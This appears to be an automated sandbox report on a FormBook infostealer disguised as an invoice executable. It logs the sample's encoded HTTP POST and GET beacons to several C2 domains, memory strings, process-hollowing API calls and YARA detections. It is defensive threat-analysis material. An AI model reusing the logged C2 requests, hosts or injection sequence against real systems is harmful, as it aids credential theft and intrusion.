          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a Data Ascii: abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUz
Source: global traffic | HTTP traffic detected: GET /an0m/?abN8C=Y8StOgjTBUc2RVi6CYGlo0NtpMFpwQziuZFViwsCv7eH1Z9qFtHxKm+jrwjT9KknvY5b&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1 | Host: www.yr-ct.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=w0B5E3Tvv+w/kd6Kt5bRc+mL8evPET7jJX5z0mytnSYVGaemefvLsJvEtAuh1jmwBHT3 HTTP/1.1 | Host: www.magentos.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=ItsweDGFEIfkN8iGMiT/CcI9tOGzcRma3szN3awFj2f289L7MYRfsokf4asOwmhwfWcg HTTP/1.1 | Host: www.aj-buckley.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /an0m/?abN8C=kOFDBNZQA2sT84b4nGvJlEsnJlkbfDKocHJFzldP3EC4MwSwQZ17LsPPvOWyctfqTmcO&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1 | Host: www.mommietalk.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.yr-ct.com
          Source: unknownHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6a 33 52 49 35 4b 46 6f 6d 49 55 57 50 30 43 64 71 41 4c 49 67 52 4b 35 6b 2d 31 30 28 55 4a 50 43 70 6b 68 31 41 78 5a 79 66 70 30 78 30 6b 64 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 72 69 35 6a 72 52 47 36 36 44 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMj3RI5KFomIUWP0CdqALIgRK5k-10(UJPCpkh1AxZyfp0x0kd2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6ri5jrRG66Dndjt-Cg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jun 2020 08:17:54 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 295Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 6e 30 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 67 65 6e 74 6f 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /an0m/ was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.magentos.info Port 80</address></body></html>
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000002.832775917.00000000034B0000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmp, WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000003.00000002.833417320.00000000036C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: WWAHost.exe, 00000008.00000002.828491882.0000000000510000.00000004.00000020.sdmpString found in binary or memory: http://www.google.ch/
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp&
          Source: WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh(
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehpH
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmp, WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1K
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmp, WWAHost.exe, 00000008.00000002.831361028.00000000031F8000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=1901
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=ssl$6e
          Source: WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslLMEMh
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslW
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslp
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/favicon.ico
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/gws_rd=ssll

          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_0042A710 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_0042A710
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00444400 GetKeyboardState,0_2_00444400
          Source: Invoice_CAII00008052.exe, 00000000.00000002.419916274.00000000007D0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Invoice_CAII00008052.exe
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00461F98 NtdllDefWindowProc_A,0_2_00461F98
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00462740 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00462740
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004627F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_004627F0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004572C4 GetSubMenu,SaveDC,RestoreDC,72B7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_004572C4
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_0044737C NtdllDefWindowProc_A,GetCapture,0_2_0044737C
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004337B0 NtdllDefWindowProc_A,0_2_004337B0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C00AB NtCreateSection,0_2_007C00AB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C04E6 VirtualAlloc,CreateProcessW,NtUnmapViewOfSection,GetThreadContext,SetThreadContext,NtResumeThread,0_2_007C04E6
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C369B NtMapViewOfSection,0_2_007C369B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C7980 NtQueryInformationProcess,NtQueryInformationProcess,0_2_007C7980
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C6CB4 SetThreadContext,NtResumeThread,0_2_007C6CB4
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00417870 NtAllocateVirtualMemory,2_2_00417870
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00417690 NtCreateFile,2_2_00417690
